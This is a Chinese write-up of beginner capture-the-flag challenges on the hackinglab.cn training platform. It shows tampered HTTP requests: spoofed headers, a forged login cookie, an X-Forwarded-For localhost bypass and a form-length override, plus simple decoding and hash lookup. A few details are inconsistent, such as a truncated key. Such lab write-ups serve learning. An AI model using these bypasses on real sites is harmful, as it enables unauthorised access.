网络安全实验室
基础关
1,key在哪里?
网址:网络安全实验室|网络信息安全攻防学习平台 (hackinglab.cn)
问题描述:key在哪里?
分值: 100
过关地址
解题步骤:
-
打开网址。 -
F12,打开浏览器调试工具。 -
查看信息,得到key。
<!--key is jflsjklejflkdsjfklds-->
2,再加密一次你就得到key啦~
网址:网络安全实验室|网络信息安全攻防学习平台 (hackinglab.cn)
问题描述:
再加密一次你就得到key啦~
分值: 150
加密之后的数据为xrlvf23xfqwsxsqf
解题步骤:
-
根据题意,“再加密一次”判断是ROT-13 -
ROT13是它自己本身的逆反;也就是说,要还原ROT13,套用加密同样的算法即可得,故同样的操作可用再加密与解密 使用在线解密工具 -
http://www.rot13.de/ -
rot3加密得到
keyis23ksdjfkfds
得到key:
23ksdjfkfds
3,猜猜这是经过了多少次加密?
网址:网络安全实验室|网络信息安全攻防学习平台 (hackinglab.cn)
问题描述:
猜猜这是经过了多少次加密?
分值: 200
加密后的字符串为:
Vm0wd......太长了就忽略了......XVmtSQk5RPT0=
解题步骤:
-
看到最后一个字符为=,联想到base64加密 -
了解base64加密 BASE64:是一种基于64个可打印字符来表示二进制数据的表示方法。Base64编码要求把3个8位字节(38=24)转化为4个6位的字节(46=24),之后在6位的前面补两个0,形成8位一个字节的形式,Base64的尾部填充用的是“=”号,只是用来补足位数的,以四个字符为一个块,最末尾不足四个字符的用“=”号填满。 base64详解地址:https://blog.csdn.net/smli_ng/article/details/109273161 base64,base32,base16的区别:
base64中包含大写字母(A-Z)、小写字母(a-z)、数字0——9以及+/;
base32中只有大写字母(A-Z)和数字234567
base16中包含了数字(0-9)和大写字母(A~F)
? 使用python脚本破解代码:
import base64
str='Vm0wd......太长了就忽略了......XVmtSQk5RPT0='
num=1
key=30
while key>=0:
try:
str=base64.b64decode(str)
key=key-1
print(num,str)
num=num+1
except:
break
输出结果:
19 b'a2V5IGlzIGprbGpka2wyMzJqa2xqa2RsMjM4OQ=='
20 b'key is jkljdkl232jkljkdl2389'
进程已结束,退出代码0
得到key:jkljdkl232jkljkdl2389
4,据说MD5加密很安全,真的是么?
网址:网络安全实验室|网络信息安全攻防学习平台 (hackinglab.cn)
问题描述:据说MD5加密很安全,真的是么?
分值: 200
e0960851294d7b2253978ba858e24633
解题步骤:
直接搜索md5在线破解器即可:
https://www.somd5.com/
得到结果
bighp
5,种族歧视
网址:网络安全实验室|网络信息安全攻防学习平台 (hackinglab.cn)
种族歧视
分值: 300
小明同学今天访问了一个网站,竟然不允许中国人访问!太坑了,于是小明同学决心一定要进去一探究竟!
通关地址
解题思路:
使用burpsuite抓包修改时区数据:
发送包:
GET /base1_0ef337f3afbe42d5619d7a36c19c20ab/index.php HTTP/1.1
Host: lab1.xseclab.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
修改为:
GET /base1_0ef337f3afbe42d5619d7a36c19c20ab/index.php HTTP/1.1
Host: lab1.xseclab.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
得到:
key is: *(TU687jksf6&*
key:*(TU687jksf6&*
6,haha浏览器
网址:网络安全实验室|网络信息安全攻防学习平台 (hackinglab.cn)
问题描述:
HAHA浏览器
分值: 200
据说信息安全小组最近出了一款新的浏览器,叫HAHA浏览器,有些题目必须通过HAHA浏览器才能答对。小明同学坚决不要装HAHA浏览器,怕有后门,但是如何才能过这个需要安装HAHA浏览器才能过的题目呢?
通关地址
解题思路:
使用burpsuite修改user-agent中浏览器数据
GET /base6_6082c908819e105c378eb93b6631c4d3/index.php HTTP/1.1
Host: lab1.xseclab.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
修改为
GET /base6_6082c908819e105c378eb93b6631c4d3/index.php HTTP/1.1
Host: lab1.xseclab.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101 HAHA/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
得到key:
恭喜您,成功安装HAHA浏览器!key is: meiyouHAHAliulanqi
得到key:meiyouHAHAliulanqi
7,key究竟在哪里呢?
网址:网络安全实验室|网络信息安全攻防学习平台 (hackinglab.cn)
问题描述:
key究竟在哪里呢?
分值: 200
上一次小明同学轻松找到了key,感觉这么简单的题目多无聊,于是有了找key的加强版,那么key这次会藏在哪里呢?
通关地址
解题步骤:
使用burpsuite抓包,将数据包右键发送到repeater后send数据包,在响应报文中看到Key: kjh%#$#%FDjjj
得到Key: kjh%
8,key又找不到了
网址:网络安全实验室|网络信息安全攻防学习平台 (hackinglab.cn)
问题描述:
key又找不到了
分值: 350
小明这次可真找不到key去哪里了,你能帮他找到key吗?
通关地址
解题步骤:
使用burpsuite抓包,点击到这里找key_后抓取发送到repeater后send数据包,在响应报文中看到key_is_here_now_.php
访问key_is_here_now_.php文件即可
得到key: ohHTTP302dd
9,冒充登陆用户
网址:网络安全实验室|网络信息安全攻防学习平台 (hackinglab.cn)
题目描述:
冒充登陆用户
分值: 200
小明来到一个网站,还是想要key,但是却怎么逗登陆不了,你能帮他登陆吗?
通关地址
解题思路:
使用burpsuite抓包,在抓取后发送到repeater将Cookie: Login=0修改为Cookie: Login=1,send数据包得到key
修改后字段
GET /base9_ab629d778e3a29540dfd60f2e548a5eb/index.php HTTP/1.1
Host: lab1.xseclab.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: Login=1
Connection: close
响应字段
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 03 Jul 2022 04:58:18 GMT
Content-Type: text/html
Connection: close
Via: 4335
Set-Cookie: Login=0
Content-Length: 152
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
</head>
<body>
key is: yescookieedit7823789KJ
得到key is: yescookieedit7823789KJ
10,比较数字大小
网址:网络安全实验室|网络信息安全攻防学习平台 (hackinglab.cn)
问题描述:
比较数字大小
分值: 100
只要比服务器上的数字大就可以了!
通关地址
解题步骤:
<html>
<head>
<meta http-equiv=Content-Type content="text/html;charset=utf-8">
</head>
<body>
<form action="" method="post">
<input type="text" maxlength="3" name="v"/>
<input type="submit" value="提交"/>
</form>
</body>
</html>
f12 修改maxlength="3"的值例如修改为:maxlength=“30000000”
后提交数字可得到:key is 768HKyu678567&*&K
11,本地的诱惑
网址:网络安全实验室|网络信息安全攻防学习平台 (hackinglab.cn)
问题描述:
本地的诱惑
分值: 200
小明扫描了他心爱的小红的电脑,发现开放了一个80端口,但是当小明去访问的时候却发现只允许从本地访问,可他心爱的小红不敢让这个诡异的小明触碰她的电脑,可小明真的想知道小红电脑的80端口到底隐藏着什么秘密(key)?
通关地址
解题思路:
使用burpsuite抓包,在抓取后发送到repeater,send数据包得到key
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 03 Jul 2022 05:14:40 GMT
Content-Type: text/html
Connection: close
Via: 4335
Content-Length: 534
<html>
<head>
<meta charset="utf-8" />
</head>
<body>
必须从本地访问! </body>
</html>
<html>
<head>
<meta charset="utf-8" />
</head>
<body>
<?php
//print_r($_SERVER);
$arr=explode(',',$_SERVER['HTTP_X_FORWARDED_FOR']);
if($arr[0]=='127.0.0.1'){
//key
echo "key is ^&*(UIHKJjkadshf";
}else{
echo "必须从本地访问!";
}
?> </body>
</html>
<?php
//SAE 服务调整,该题目无法继续...可尝试自行搭建环境测试.
echo file_get_contents(__FILE__);
得到key:key is ^&*(UIHKJjkadshf
12,就不让你访问
网址:网络安全实验室|网络信息安全攻防学习平台 (hackinglab.cn)
问题描述:
就不让你访问
分值: 150
小明设计了一个网站,因为总是遭受黑客攻击后台,所以这次他把后台放到了一个无论是什么人都找不到的地方....可最后还是被黑客找到了,并被放置了一个黑页,写到:find you ,no more than 3 secs!
通关地址
解题思路:
提示I am index.php , I am not the admin page ,key is in admin page. 我是index.php,我不是管理页面,密钥在管理页面中。那我们就去管理页面。
使用robots协议,查看那些是可以访问的文件:lab1.xseclab.com/base12_44f0d8a96eed21afdc4823a0bf1a316b/robots.txt
User-agent: *
Disallow: /
Crawl-delay: 120
Disallow: /9fb97531fe95594603aff7e794ab2f5f/
Sitemap: http://www.hackinglab.sinaapp.com/sitemap.xml
访问 /9fb97531fe95594603aff7e794ab2f5f/
lab1.xseclab.com/base12_44f0d8a96eed21afdc4823a0bf1a316b//9fb97531fe95594603aff7e794ab2f5f/
you find me,but I am not the login page. keep search.
你找到我了,但我不是登录页面。继续搜索。
去到登录界面:
http://lab1.xseclab.com/base12_44f0d8a96eed21afdc4823a0bf1a316b//9fb97531fe95594603aff7e794ab2f5f/login.php
得到:
right! key is UIJ%%IOOqweqwsdf
得到key:right! key is UIJ%%IOOqweqwsdf
|